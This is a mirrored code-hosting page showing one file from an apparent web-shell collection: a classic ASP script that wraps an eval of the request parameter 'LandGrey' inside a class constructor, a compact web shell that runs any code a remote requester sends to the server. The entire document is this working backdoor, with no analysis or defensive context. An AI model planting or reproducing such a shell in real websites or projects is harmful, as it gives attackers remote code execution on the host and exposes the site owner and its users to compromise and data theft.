mirror of
https://github.com/tennc/webshell
synced 2024-11-25 04:30:17 +00:00
9 lines
132 B
Text
9 lines
132 B
Text
|
<%
|
||
|
Class LandGrey
|
||
|
Private Sub Class_Initialize
|
||
|
eval (request("LandGrey"))
|
||
|
End Sub
|
||
|
End Class
|
||
|
|
||
|
Set X = New LandGrey
|
||
|
%>
|